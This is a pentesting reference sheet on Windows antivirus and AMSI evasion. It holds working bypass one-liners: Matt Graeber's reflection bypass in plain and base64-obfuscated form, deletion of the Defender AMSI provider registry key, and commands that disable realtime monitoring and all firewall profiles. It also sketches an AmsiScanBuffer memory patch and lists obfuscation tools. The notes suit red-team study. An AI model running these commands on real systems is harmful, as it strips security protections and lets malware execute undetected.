5.8 KiB
5.8 KiB
Antivirus Evasion
-
Existing types
- On-Disk evasion
- In-Memory evasion
-
Detection Methods
- Static Detection -- Hash or String/Byte Matching
- Dynamic / Heuristic / Behaviourial Detection -- predefined rules, run inside a sandbox
Enumeration
wmic /namespace:\\root\securitycenter2 path antivirusproduct
Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct
Get-Service WinDefend
Get-MpComputerStatus | select RealTimeProtectionEnabled
- Check firewall
Get-NetFirewallProfile | Format-Table Name, Enabled
Get-NetFirewallRule | select DisplayName, Enabled, Description
- Check inbound port availability
Test-NetConnection -ComputerName 127.0.0.1 -Port 80
Reset Options
Set-NetFirewallProfile -Profile Domain, Public, Private -Enabled False
Anti Malware Secure Interface
-
Powershell .NET runtime detection measure of windows. Scans code before executed.
-
https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-functions
-
https://docs.microsoft.com/en-us/windows/win32/api/amsi/nn-amsi-iamsistream
-
Integrated inside components
- User Account Control (UAC)
- Powershell
- Windows Script Host (wscript, csrcipt)
- JavaScript and VBScript
- VBA macros
-
System.Management.Automation.dll -
Flow
| Win32 API | COM API | AV Provider |
Interpreter --> AMSIScanBuffer --> AMSIScanString --> IAntiMalware::Scan() --> IAntiMalwareProvider::Scan()
Return Result/Response Codes
AMSI_RESULT_CLEAN = 0
AMSI_RESULT_NOT_DETECTED = 1
AMSI_RESULT_BLOCKED_BY_ADMIN_START = 16384
AMSI_RESULT_BLOCKED_BY_ADMIN_END = 20479
AMSI_RESULT_DETECTED = 32768
PowerShell Downgrade Attack
- Downgrade Powershell version to 2.0, where no AMSI is implemented
PowerShell -Version 2
- Unicorn does leverage this
Reflection Bypass
- Varying string concatenation and camelCasing variations of the following string by Matt Graeber
- Matt Graeber's Reflection
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
or an obfuscated version
[Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true)
Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse
Set-MpPreference -DisableRealtimeMonitoring $true
AMSI ScanBuffer patch
-
Patching
amsi.dll, which is loaded at Powershell startup -
AMSI ScanBuffer is delivered to
amsi.dll -
Get handle of
amsi.dll -
Get process address of AmsiScanBuffer
-
Modify mem protection of AmsiScanBuffer
-
Write opcode to AMSIScanBuffer
Other Bypasses and Tools
-
amsifail generates obfuscated snippets
Validate
- AMSITrigger identifies strings which trigger the AMSI functions
- Validate Obfuscation and check which strings trigger AMSI
- AMSITrigger Repo
.\\AMSITrigger.exe -u <URL> -f 1
or
.\\AMSITrigger.exe -i <file> -f 1
Further Obfuscation
- String concatenation
$OBF = 'Ob' + 'fu' + 's' +'cation'
Concatenate - ('co'+'ffe'+'e')Reorder - ('{1}{0}'-f'ffee','co')Whitespace - ( 'co' +'fee' + 'e')
Type Obfuscation
-
.NET has type accelerators as aliases for types to shorten them and break the signature.
-
Example
- Without
[system.runtime.interopservices.marshal]::copy($buf, 0, $BufferAddress, 6);
* With
[dorkstork]::copy($buf, 0, $BufferAddress, 6);
Automated Obfuscation
Powershell
Invoke-Obfuscation -ScriptBlock {'Payload Here'} -Command 'Token\\String\\1,2,\\Whitespace\\1' -Quiet -NoExit
- 8191 character limit of command prompt must not be exceeded.
Other Obfuscation
- Pinpoint bytes that will be flagged with ThreadCheck
- Has to be build via VS. Will output a ddll, an excutable and an XML file.
ThreatCheck.exe -f <file>
- DefenderCheck